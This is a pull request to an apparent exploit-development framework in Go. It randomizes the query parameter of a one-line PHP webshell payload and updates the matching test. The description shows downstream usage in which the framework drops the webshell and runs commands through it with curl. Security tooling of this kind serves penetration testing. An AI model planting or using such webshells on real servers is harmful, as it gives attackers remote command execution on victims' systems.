### PR TITLE
Randomize the parameter used in the minimal webshell

### DIFF
--- a/java/javaclass.go
+++ b/java/javaclass.go
@@ -227,6 +227,7 @@ func ReverseShellBytecode(conf *config.Config) (string, string) {
 
 	return reverseShell, classString
 }
+
 // This is the Java bytecode for a reverse shell. You can find the source code here:
 //
 // https://gist.github.com/j-shomo/053031f2ee9ba7f29fca2305c6ea8c6a

--- a/payload/webshell/php.go
+++ b/payload/webshell/php.go
@@ -1,6 +1,17 @@
 package webshell
 
-// A very basic PHP webshell using short tags and no error checking.
-func (php *PHPWebshell) MinimalGet() string {
-	return "<?=`$_GET[0]`?>"
+import (
+	"fmt"
+
+	"github.com/vulncheck-oss/go-exploit/random"
+)
+
+// A very basic PHP webshell using short tags and no error checking. The webshell
+// will generate a random variable to fetch the command from. Usage example:
+//
+//	shell, param := webshell.PHP.MinimalGet()
+func (php *PHPWebshell) MinimalGet() (string, string) {
+	index := random.RandLetters(8)
+
+	return fmt.Sprintf("<?=`$_GET[%s]`?>", index), index
 }

--- a/payload/webshell/webshell_test.go
+++ b/payload/webshell/webshell_test.go
@@ -1,14 +1,21 @@
 package webshell_test
 
 import (
+	"strings"
 	"testing"
 
 	"github.com/vulncheck-oss/go-exploit/payload/webshell"
 )
 
 func TestVerySmallHTTPGET(t *testing.T) {
-	phpPayload := webshell.PHP.MinimalGet()
-	if phpPayload != "<?=`$_GET[0]`?>" {
+	shell, param := webshell.PHP.MinimalGet()
+	if !strings.HasPrefix(shell, "<?=`$_GET[") {
+		t.Fatal("PHP Minimal GET payload is in an unexpected format.")
+	}
+	if !strings.HasSuffix(shell, "]`?>") {
+		t.Fatal("PHP Minimal GET payload is in an unexpected format.")
+	}
+	if len(param) != 8 {
 		t.Fatal("PHP Minimal GET payload is in an unexpected format.")
 	}
 }


### PR DESCRIPTION
At @terrorbyte's suggestion, added a loose scheme to ensure that randos can't use the webshell. Usage is basically the same except the parameter to use is also spit out. E.g. Usage example:

```go
webshellPayload, cmdParam := webshell.PHP.MinimalGet()
```

Downstream that looks like:

```go
url = protocol.GenerateURL(conf.Rhost, conf.Rport, conf.SSL, "/"+webshellName)
output.PrintfSuccess("Minimal webshell dropped to %s", url)
output.PrintfSuccess("Example usage: curl -kv %s?%s=id", url, cmdParam)
```